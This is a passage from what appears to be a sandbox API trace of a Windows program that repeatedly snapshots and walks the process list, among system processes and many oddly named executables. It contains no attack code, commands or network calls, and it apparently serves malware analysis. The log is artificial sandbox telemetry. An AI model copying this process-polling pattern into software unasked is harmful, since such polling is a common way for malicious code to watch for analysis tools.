dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0143.982] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0143.983] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0143.984] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0143.987] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0143.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0143.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0143.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0143.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0143.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0143.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.000] CloseHandle (hObject=0xc4) returned 1 [0144.000] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.006] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.007] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0144.008] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.009] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.067] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0144.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.070] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.071] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.072] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.073] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.073] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.074] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.075] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.077] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.078] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0144.079] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0144.080] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0144.081] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.082] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0144.083] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0144.084] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0144.086] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0144.087] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0144.088] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0144.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0144.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0144.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0144.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0144.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0144.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0144.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0144.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0144.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0144.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0144.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0144.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0144.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0144.104] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0144.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0144.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0144.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0144.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0144.127] CloseHandle (hObject=0xbc) returned 1 [0144.127] Sleep (dwMilliseconds=0x12c) [0144.443] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0144.448] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.449] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0144.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0144.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0144.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0144.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0144.453] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0144.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0144.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0144.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.457] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.457] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.458] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0144.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.459] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0144.460] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0144.461] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, 